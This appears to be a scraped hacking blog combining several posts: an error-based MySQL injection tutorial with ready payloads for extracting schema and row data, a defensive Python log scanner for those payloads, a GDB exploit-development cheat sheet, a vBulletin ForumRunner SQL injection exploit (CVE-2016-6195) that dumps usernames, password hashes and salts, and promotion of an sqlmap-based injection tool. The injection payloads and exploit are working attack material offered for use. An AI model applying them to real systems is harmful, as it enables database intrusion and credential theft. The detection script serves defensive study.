<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5ewLvdwunAT7sr38GjO0XhLTrs3vrPyIfT7QTzEu2YruGrwJy_HQaEPB2vKFg1hOR6_HEj74yYsXtRXJslY1jQfRZrwroNxvPJ0itEdh7t3vxDO1BB5hRQOLiFSbmmB3PclttyffRCXg/s1600/column+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="570" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5ewLvdwunAT7sr38GjO0XhLTrs3vrPyIfT7QTzEu2YruGrwJy_HQaEPB2vKFg1hOR6_HEj74yYsXtRXJslY1jQfRZrwroNxvPJ0itEdh7t3vxDO1BB5hRQOLiFSbmmB3PclttyffRCXg/s1600/column+1.png" /></a></div>
<br />
To extract the next column name, change the value in the limit clause from 0,1 to 1,1 and so on.<br />
<br />
<u>Data extraction</u><br />
-> ' and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select user from data limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2<br />
<br />
In my case the column name is "user" and the table name is "data"; replace them with the appropriate column name and table name so that you can extract data.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4Sen0A0F1bcWzuhsPcilbofoipbIVELbrh4yWZ7JnAX3sAi_S95yuad2o34IF2LPhRTAG6Dju4bHsyugZPawfDeikTTsrPzDAmQrZdKZOwbMMTlpEE86G1bwHq1P7DI1b7supu4RtRG0/s1600/data+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="651" data-original-width="1402" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4Sen0A0F1bcWzuhsPcilbofoipbIVELbrh4yWZ7JnAX3sAi_S95yuad2o34IF2LPhRTAG6Dju4bHsyugZPawfDeikTTsrPzDAmQrZdKZOwbMMTlpEE86G1bwHq1P7DI1b7supu4RtRG0/s1600/data+1.png" /></a></div>
<br />
<br />
<b>Case 2 - String Based (using extractvalue function)</b><br />
<br />
<u>Database Name extraction</u><br />
-> ' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 1,1),0x7e )) and 1<'2<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguEvPb4J9TR53b7eGPhdY-VhVUekaNuWCAE5v7jYp2z9xtkTMxrtJH5_Lx7xpdPi7dsV_a-r73hECk0AELpMeoZ7GTJ1Y4YL_6J8jib8GH6yjToFadYIjKlE3jjAJyZn1Atyl-JRqb48M/s1600/database+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="666" data-original-width="1282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguEvPb4J9TR53b7eGPhdY-VhVUekaNuWCAE5v7jYp2z9xtkTMxrtJH5_Lx7xpdPi7dsV_a-r73hECk0AELpMeoZ7GTJ1Y4YL_6J8jib8GH6yjToFadYIjKlE3jjAJyZn1Atyl-JRqb48M/s1600/database+2.png" /></a></div>
<u>Table name extraction</u><br />
-> ' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 1,1),0x7e )) and 1<'2<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6LkVjSSu8uQbO_wIW9yslKuiF04koGbUlzAfqwJqDsktFntkoqH4eidz28pyQZZFGo0InB1jrY3_qLEvB3mEsAdKds-evIZxnkef3Tow6rHMZ-NkCbqfCpJT3ZjoY0x8peKkS6fDy3a0/s1600/table+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="639" data-original-width="1281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6LkVjSSu8uQbO_wIW9yslKuiF04koGbUlzAfqwJqDsktFntkoqH4eidz28pyQZZFGo0InB1jrY3_qLEvB3mEsAdKds-evIZxnkef3Tow6rHMZ-NkCbqfCpJT3ZjoY0x8peKkS6fDy3a0/s1600/table+2.png" /></a></div>
<br />
<u>Column name extraction</u><br />
-> ' and extractvalue(6678,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() LIMIT 0,1),0x7e )) and 1<'2<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4thv_-eQfVZmvQMnXJBjGBzPLWj4SComVaDCwOUJB-v3fV5eeudlFFUyib0FQBTzefa9XhWxDxgzx6tzT33pDLhCbPzF26RJzo8oyr0xkXrG5FgqL7ISux9Gu9ogxnrxWWE8IautC4hQ/s1600/column+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="694" data-original-width="1515" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4thv_-eQfVZmvQMnXJBjGBzPLWj4SComVaDCwOUJB-v3fV5eeudlFFUyib0FQBTzefa9XhWxDxgzx6tzT33pDLhCbPzF26RJzo8oyr0xkXrG5FgqL7ISux9Gu9ogxnrxWWE8IautC4hQ/s1600/column+3.png" /></a></div>
<br />
<u>Data extraction</u><br />
-> ' and extractvalue(6678,concat(0x7e,(select id from data LIMIT 0,1),0x7e )) and 1<'2<br />
<br />
In my case the column name is "id" and the table name is "data"; replace them with the appropriate column name and table name so that you can extract data.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuNHFXT5WhU1eryv-IhMygT5NHey7ClTRyo81wPwR52G0N0HmsBbSbeFwQuBuLfgn-ddvtceHOV0kJlJZ0adS_NBCP4LyPumLYowOL8CO1DKbVGKk2_mTDfZzO4tqPH9IaGvO-Sb_fj0g/s1600/data+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="633" data-original-width="1351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuNHFXT5WhU1eryv-IhMygT5NHey7ClTRyo81wPwR52G0N0HmsBbSbeFwQuBuLfgn-ddvtceHOV0kJlJZ0adS_NBCP4LyPumLYowOL8CO1DKbVGKk2_mTDfZzO4tqPH9IaGvO-Sb_fj0g/s1600/data+3.png" /></a></div>
<br />
<br />
<b>Case 3 - String Based (using multipolygon function)</b><br />
<br />
<u>Database Name extraction</u> <br />
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,database(),0x7e))a)b))) and 1<'2<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPI6N7q_zihIy7V9w4qsx2cUZbhZ94ZRcX-bAjYEkdZ_O1qoLK-vIYOL4y43D5qxjRrf49-setUMWndI8TCFG8KAWx-Uve00TdR3Uh90avAbGkKak1goY9he20gVAIBprj_qgI1AV23Jc/s1600/database+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="578" data-original-width="1470" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPI6N7q_zihIy7V9w4qsx2cUZbhZ94ZRcX-bAjYEkdZ_O1qoLK-vIYOL4y43D5qxjRrf49-setUMWndI8TCFG8KAWx-Uve00TdR3Uh90avAbGkKak1goY9he20gVAIBprj_qgI1AV23Jc/s1600/database+3.png" /></a></div>
<br />
<u>Table name extraction</u><br />
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema=database() limit 0,1)a)b))) and 1<'2<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG81UhYPIttiylrFm-yJULCCVGJRaUKSMDpuUtioNYwT9M2KSLIsQXCty7iDP6vgTyF7kJrI3vz7EDoMHNc9Niu6J0sMclm5huspPXwSgWXpT5WvDup8vnvUbz1zge3qeSH20UfET1CH0/s1600/table+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="594" data-original-width="1600" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG81UhYPIttiylrFm-yJULCCVGJRaUKSMDpuUtioNYwT9M2KSLIsQXCty7iDP6vgTyF7kJrI3vz7EDoMHNc9Niu6J0sMclm5huspPXwSgWXpT5WvDup8vnvUbz1zge3qeSH20UfET1CH0/s640/table+3.png" width="640" /></a></div>
<br />
<br />
<u>Column name extraction</u><br />
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema=database() limit 0,1)a)b))) and 1<'2<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4thv_-eQfVZmvQMnXJBjGBzPLWj4SComVaDCwOUJB-v3fV5eeudlFFUyib0FQBTzefa9XhWxDxgzx6tzT33pDLhCbPzF26RJzo8oyr0xkXrG5FgqL7ISux9Gu9ogxnrxWWE8IautC4hQ/s1600/column+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="694" data-original-width="1515" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4thv_-eQfVZmvQMnXJBjGBzPLWj4SComVaDCwOUJB-v3fV5eeudlFFUyib0FQBTzefa9XhWxDxgzx6tzT33pDLhCbPzF26RJzo8oyr0xkXrG5FgqL7ISux9Gu9ogxnrxWWE8IautC4hQ/s1600/column+3.png" /></a></div>
<br />
<br />
<u>Data extraction</u><br />
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,id,0x7e,user,0x7e) from data limit 0,1)a)b))) and 1<'2<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuNHFXT5WhU1eryv-IhMygT5NHey7ClTRyo81wPwR52G0N0HmsBbSbeFwQuBuLfgn-ddvtceHOV0kJlJZ0adS_NBCP4LyPumLYowOL8CO1DKbVGKk2_mTDfZzO4tqPH9IaGvO-Sb_fj0g/s1600/data+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="633" data-original-width="1351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuNHFXT5WhU1eryv-IhMygT5NHey7ClTRyo81wPwR52G0N0HmsBbSbeFwQuBuLfgn-ddvtceHOV0kJlJZ0adS_NBCP4LyPumLYowOL8CO1DKbVGKk2_mTDfZzO4tqPH9IaGvO-Sb_fj0g/s1600/data+3.png" /></a></div>
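From the defender's side, the three error-based shapes above (the floor(rand(0)*2) GROUP BY trick, extractvalue(), multipolygon()) are easy to recognise in web server logs once the request is URL-decoded. The following Python is an added example, not code from the original post; the access-log lines, hosts and paths in it are constructed for the demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache "combined" style, with the request
# body appended as a last quoted field for the POST). Hosts, paths and times are
# made up for this demo; the injected fragments are the shapes shown above.
SAMPLE_LOG = r"""
10.0.0.5 - - [01/Mar/2024:10:00:01 +0000] "GET /profile.php?id=1'+and+(select+1+FROM(select+count(*),concat((select(select+concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),0x7e))),floor(rand(0)*2))x+FROM+information_schema.tables+GROUP+BY+x)a)+and+1<'2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Mar/2024:10:00:02 +0000] "GET /profile.php?id=1'+and+extractvalue(6678,concat(0x7e,(select+column_name+from+information_schema.columns+LIMIT+0,1),0x7e))+and+1<'2 HTTP/1.1" 500 128 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Mar/2024:10:00:03 +0000] "POST /update.php HTTP/1.1" 200 64 "-" "Mozilla/5.0" "name=x'+and+(select+multipolygon((select+1+from+(select+*+from+(select+concat(0x7e,database(),0x7e))a)b)))+and+1<'2"
192.168.1.9 - - [01/Mar/2024:10:00:04 +0000] "GET /profile.php?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.1.9 - - [01/Mar/2024:10:00:05 +0000] "GET /search.php?q=rand+floor+plans HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Each signature is one error-based extraction shape from the post, matched
# against a normalized (decoded, lower-cased, whitespace-collapsed) line.
SIGNATURES = {
    # Double-query trick: floor(rand(0)*2) used as a GROUP BY key makes MySQL
    # raise a duplicate-key error whose text carries the concat()'d value.
    "double-query-floor-rand": re.compile(r"floor\(rand\(0\)\*2\).*group by"),
    # extractvalue() raises an XPath syntax error that echoes its argument.
    "extractvalue-xpath-error": re.compile(r"\bextractvalue\s*\("),
    # multipolygon() fed a non-geometry subquery errors out the same way.
    "multipolygon-geometry-error": re.compile(r"\bmultipolygon\s*\("),
    # Metadata enumeration accompanies every payload in the post.
    "information-schema-enum": re.compile(r"information_schema\.(tables|columns)"),
}


def normalize(line: str) -> str:
    """Decode one URL-encoding layer ('+' becomes a space), fold case and
    collapse whitespace so 'GROUP   BY' and 'group by' compare equal."""
    return re.sub(r"\s+", " ", unquote_plus(line)).lower()


def scan_log(text: str) -> list:
    """Return one hit per matching line: its 1-based number, the client
    address (first field) and the names of the signatures that fired."""
    hits = []
    for line_no, raw in enumerate(text.strip().splitlines(), start=1):
        norm = normalize(raw)
        fired = [name for name, rx in SIGNATURES.items() if rx.search(norm)]
        if fired:
            hits.append({"line_no": line_no,
                         "client": raw.split(" ", 1)[0],
                         "signatures": fired})
    return hits


if __name__ == "__main__":
    # Lines 1-3 fire; the two benign requests (including "rand floor plans") do not.
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line_no']} from {hit['client']}: "
              + ", ".join(hit["signatures"]))
```

A 500 status paired with one of these signatures (line 2 above) is the strongest indicator, since error-based extraction only works when the database error reaches the response.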
</div>
Mannu Linux<br />
<br />
GDB cheat-sheet for exploit development (Mannu Linux, published 2017-01-16)<div dir="ltr" style="text-align: left;" trbidi="on">
Pranaam to all bhai ji _/\_<br />
<br />
Today I am going to share a few commands of GDB (GNU Debugger) which come in handy during the learning process.<br />
This list has the common commands that make GDB easier for beginners.<br />
<br />
File to disable/enable ASLR<br />
/proc/sys/kernel/randomize_va_space<br />
<br />
Download PEDA<br />
https://github.com/longld/peda<br />
Integrate it into gdb<br />
echo "source ~/peda/peda.py" >> ~/.gdbinit<br />
<br />
-----<br />
| GCC<br />
-----<br />
=> Compile options to<br />
make the stack executable<br />
-z execstack<br />
remove the stack guard/canaries<br />
-fno-stack-protector<br />
<br />
=> Attach a program to GDB<br />
using the program executable -> gdb program_file<br />
using a running program's process ID -> gdb --pid=process_id<br />
<br />
=> Show the list of command classes<br />
help<br />
help class_of_command<br />
<br />
=> Breakpoints<br />
set a breakpoint<br />
break function_name<br />
break *memory_address<br />
information regarding breakpoints<br />
info breakpoints<br />
info break breakpoint_number<br />
<br />
=> Disassemble a function<br />
disas function_name<br />
<br />
=> Print the function list<br />
info func<br />
<br />
=> Run the program with different modes of input<br />
r data<br />
r $(python -c 'some python code')<br />
r < file_having_data<br />
<br />
=> Print the value at a specific memory address or in a register<br />
p memory_address/register<br />
different print formats<br />
p/x Print as an integer variable in hex.<br />
p/d Print the variable as a signed integer.<br />
p/u Print the variable as an unsigned integer.<br />
p/o Print the variable as octal.<br />
p/c Print the integer as a character.<br />
p/f Print the variable as a floating point number.<br />
p/a Print as a hex address.<br />
<br />
=> Examine memory using x<br />
x/FMT address<br />
supported FMT is a repeat count followed by a format letter and a size letter.<br />
Format letters are<br />
o (octal)<br />
x (hex)<br />
d (decimal)<br />
u (unsigned decimal)<br />
t (binary)<br />
f (float)<br />
a (address)<br />
i (instruction)<br />
c (char)<br />
s (string)<br />
and z (hex, zero padded on the left).<br />
Size letters are b (byte), h (halfword), w (word), g (giant, 8 bytes).<br />
example: x/10s $esp/memory_address or x/10sw $esp/memory_address<br />
x/10s $esp/memory_address-offset<br />
<br />
=> Display current information related to the CPU registers<br />
info r<br />
<br />
=> Execute the next instruction<br />
ni<br />
=> Step inside a function<br />
si<br />
<br />
=> Set the value of a register or memory address<br />
set $register = hex_value<br />
<br />
=> Print the memory address of a function<br />
p function_name<br />
example: p system<br />
<br />
=> Search memory for a string<br />
find &system,+9999999,"/bin/sh" (for old gdb)<br />
find "/bin/sh"<br />
<br />
<br />
--==[[ With Love from Team IndiShell ]]==--<br />
<br />
<br />
<br />
<pre>
 --==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
#############################################################################################
 --==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
</pre>
<br /> </div>
Mannu Linux<br />
<br />
vBulletin <=4.2.3 - 'ForumRunner' SQL Injection (Mannu Linux, published 2016-11-13, updated 2019-05-18)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="container">
<pre>
##################################################################################################
#Exploit Title : vBulletin <= 4.2.3 SQL Injection (CVE-2016-6195)
#Author : Manish Kishan Tanwar AKA error1046 (https://twitter.com/IndiShell1046)
#Date : 25/08/2015
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Tested At : Indishell Lab(originally developed by Dantalion)
##################################################################################################

////////////////////////
/// Overview:
////////////////////////

vBulletin versions 3.6.0 through 4.2.3 are vulnerable to SQL injection in the vBulletin core forumrunner addon.
The vulnerability was analyzed and documented by Dantalion (https://enumerated.wordpress.com/2016/07/11/1/)
so credit goes to Dantalion only :)



////////////////
/// POC ////
///////////////

SQL Injection payload to enumerate table names
----------------------------------------------
http://forum_directory/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x),5,6,7,8,9,10-- -


SQL Injection payload to enumerate column names from table "user"
----------------------------------------------------------------
http://forum_directory/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.columns)where (table_name=0x75736572) and (0x00) in (@x:=concat(@x,0x3c62723e,column_name))))x),5,6,7,8,9,10-- -


SQL Injection payload to enumerate username,password hash and salt from "user" table
----------------------------------------------------------------------------------
http://forum_directory//forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select (@x) from (select (@x:=0x00),(select (0) from (user)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,password,0x3a,salt))))x),5,6,7,8,9,10-- -

/////////////////
exploit code ends here




 --==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
#############################################################################################
 --==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
 --==[[ Special Fuck goes to ]]==--
 <3 suriya Cyber Tyson <3
</pre>
</div>
</div>
Mannu Linux<br />
<br />
SQL_Injector Version-2 by incredible (Mannu Linux, published 2016-06-03)<div dir="ltr" style="text-align: left;" trbidi="on">
Hello,<br />
<br />
<div style="text-align: justify;">
I am here with the advanced version of SQL_Inj3ct0r. In this version I have added a few more functionalities to the tool. We will see what these functionalities are in this post.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The previously released SQL_Inj3ct0r was a simple PHP script integrated with sqlmap and was able to perform SQL injection via the GET method only. For details and usage of the previous script, please visit the following link:</div>
<div style="text-align: justify;">
<a href="http://mannulinux.blogspot.in/2015/08/sqlinj3ct0r_17.html" target="_blank">http://mannulinux.blogspot.in/2015/08/sqlinj3ct0r_17.html</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This version of SQL_Inj3ct0r has two more methods by which you can exploit your target using SQL injection.</div>
<div style="text-align: justify;">
1. Via the POST method</div>
<div style="text-align: justify;">
2. Using a file.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Download link :</u></div>
<div style="text-align: justify;">
<span style="color: blue;"><span style="color: #3d85c6;">You can download this script "Advanced SQL_Inj3ct0r" from here :</span></span></div>
<div style="text-align: justify;">
<a href="https://github.com/incredibleindishell/Panda-sql-injector/blob/master/SQL-Injector%20v2.php" target="_blank">SQL-Injector v2</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<u>Usage:</u> </div>
<div style="text-align: justify;">
Please refer to the following screenshots as the manual for the script:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
1. You will get the modules shown in the screenshot on first access of 'Advanced_injector.php'. You can download sqlmap here. If you already have sqlmap, simply set its location using the "Set" button.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg42LUATnMDUDsA2g6easOHHVzFT892Rk5kvCVmVOzW6A8YXibPFwjdzlD3KeY2LjF71inWtaHwzYPSd6ECq07gqYp886rqX9nYPBJMtC3zMEiHRlWOGVZjPh4XYc4dQ7AHUwOgqVZMuA4/s1600/1downloadsqlmap.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg42LUATnMDUDsA2g6easOHHVzFT892Rk5kvCVmVOzW6A8YXibPFwjdzlD3KeY2LjF71inWtaHwzYPSd6ECq07gqYp886rqX9nYPBJMtC3zMEiHRlWOGVZjPh4XYc4dQ7AHUwOgqVZMuA4/s1600/1downloadsqlmap.png" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
2. If you download sqlmap, SQL_Inject0r will show the location of sqlmap. Simply type the path in the input box as shown and hit "Set". Refer to the screenshot below.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheWK468ztOGsTaKYPQAtac_TrbMDWsPsSNkwU7rEfRuWcXIT4fk9Xlg2pQjcyQBsQqK_T4otlUvZcR4DJKvKXC1-R_Invi-zDf_nvoAyraU21EECpxPw2DS4xbN09hPzRllMRFoW3046A/s1600/2afterdownload.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheWK468ztOGsTaKYPQAtac_TrbMDWsPsSNkwU7rEfRuWcXIT4fk9Xlg2pQjcyQBsQqK_T4otlUvZcR4DJKvKXC1-R_Invi-zDf_nvoAyraU21EECpxPw2DS4xbN09hPzRllMRFoW3046A/s1600/2afterdownload.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
3. After setting the location you will be redirected to the following main module, where you get 4 options: three of them ('GET Method', 'POST Method', 'Inject using file') inject the target via 3 different methods, and one option generates a file.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If you want to change the path/location of sqlmap, you may use the "Reset SQLMAP path" button as shown in the screenshot.</div>
<div style="text-align: justify;">
For reference:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwjpw-K-sX72NkEIGb9EuaOX3iDNm3j59c5Lt35c0I8DEwPrmYY-QTOXw7DRmHyDQnzX3EuPukmlS4C9nGhKFm0Gh3A1aqLNlH6PArZSLgRBk37LCGJ4_KuBoH9u_uBaWgfptwybmGuGM/s1600/3homemodule.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwjpw-K-sX72NkEIGb9EuaOX3iDNm3j59c5Lt35c0I8DEwPrmYY-QTOXw7DRmHyDQnzX3EuPukmlS4C9nGhKFm0Gh3A1aqLNlH6PArZSLgRBk37LCGJ4_KuBoH9u_uBaWgfptwybmGuGM/s1600/3homemodule.png" /></a></div>
4. You may proceed with any of the three methods in order to inject your target. To know the complete exploitation method through 'Inject via GET method', you may have a look at the previous version of SQL_Inject0r: refer to this <b><a href="https://github.com/incredibleindishell/Panda-sql-injector/blob/master/SQL-Injector%20v1.php" target="_blank">Link</a></b><br />
<br />
<span style="color: white;"><b>a) Injecting target using GET Method.</b></span><br />
Exploitation 'Level', 'Risk' and 'Technique' are also implemented in the newer version of Inject0r.<br />
You can set any value for 'Level' (from 1 to 5) and 'Risk' (from 1 to 3). If you don't specify a value, SQL_Inject0r proceeds with exploitation using the default values.<br />
For the exploitation technique (depending on the SQL injection type) you can choose any of the 5.<br />
The following types of SQL injection can be performed using Inject0r:<br />
<span style="color: white;"><span style="background-color: black;">(i) Union based SQLi</span></span><br />
<span style="color: white;"><span style="background-color: black;">(ii) Error based SQLi</span></span><br />
<span style="color: white;"><span style="background-color: black;">(iii) Boolean based SQLi</span></span><br />
<span style="color: white;"><span style="background-color: black;">(iv) Time based SQLi</span></span><br />
<span style="color: white;"><span style="background-color: black;">(v) Stack query based SQLi</span></span><br />
<br />
Please refer to the following screenshot:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWJ2YplhrCuo8t9Efql67zUXyob74_EVnOSklS6tJ0mZNiRrFCeSHW8HsihrpJs1kwMQ9E8g_rY09-Xzij9T_evhftVYByBbAACmPrXzOZduTELK_lV6eT-IE-JFlteao1dNfjNz5BEm8/s1600/4getmethod.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWJ2YplhrCuo8t9Efql67zUXyob74_EVnOSklS6tJ0mZNiRrFCeSHW8HsihrpJs1kwMQ9E8g_rY09-Xzij9T_evhftVYByBbAACmPrXzOZduTELK_lV6eT-IE-JFlteao1dNfjNz5BEm8/s1600/4getmethod.png" /></a></div>
<br />
<span style="background-color: black;"><span style="color: white;"><b>b) Injecting target using POST Method.</b></span></span><br />
In this module you have to provide the vulnerable URL and the POST parameters in the input boxes, as shown in the following screenshot:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgemhBPrJ8D0sf93OXTN7GHPIAW7hCK8A-OT_iQZ7Pu_eQo5ETKs25Ar_HHYMO5JBjg1I5Ttco85SrLFjbqWugXaJbQ1W0nn82vlnZFBnL6JTx7BpJL5wYujgYLapVyNWpv_Lh5ZQF4cKE/s1600/5postparameter.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgemhBPrJ8D0sf93OXTN7GHPIAW7hCK8A-OT_iQZ7Pu_eQo5ETKs25Ar_HHYMO5JBjg1I5Ttco85SrLFjbqWugXaJbQ1W0nn82vlnZFBnL6JTx7BpJL5wYujgYLapVyNWpv_Lh5ZQF4cKE/s1600/5postparameter.png" /></a></div>
<br />
After that, set Level and Risk, select your exploitation technique and hit the "Exploit" button.<br />
<br />
<br />
<span style="background-color: black;"><span style="color: white;"><b>c) Generating a file.</b></span></span><br />
Using this module you can generate a txt file which contains the request header. This file will be used to inject the target through the "Inject using file" module.<br />
To generate the file you need to provide a name for the file with a .txt extension and paste the request header into the text area, as shown in the screenshot below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb1xdF8cJOBLlv288dQPCf7_bMRo5A-_LbytuddLdI36x9OoU4TIRkvFNu0AZrTRAwB7oVttgi3dlzhvCsmcI9QlmeGYu0ENG9TGECoCjc5wTeRyJ0jcWm3Mam1vw0Xf4pdvSDRY-Xdls/s1600/6genfile.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb1xdF8cJOBLlv288dQPCf7_bMRo5A-_LbytuddLdI36x9OoU4TIRkvFNu0AZrTRAwB7oVttgi3dlzhvCsmcI9QlmeGYu0ENG9TGECoCjc5wTeRyJ0jcWm3Mam1vw0Xf4pdvSDRY-Xdls/s1600/6genfile.png" /></a></div>
<br />
After pasting the request header, hit the "Generate File" button. SQL_Inject0r will generate the file with the name you gave, in the current working directory. Refer to the following screenshot:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
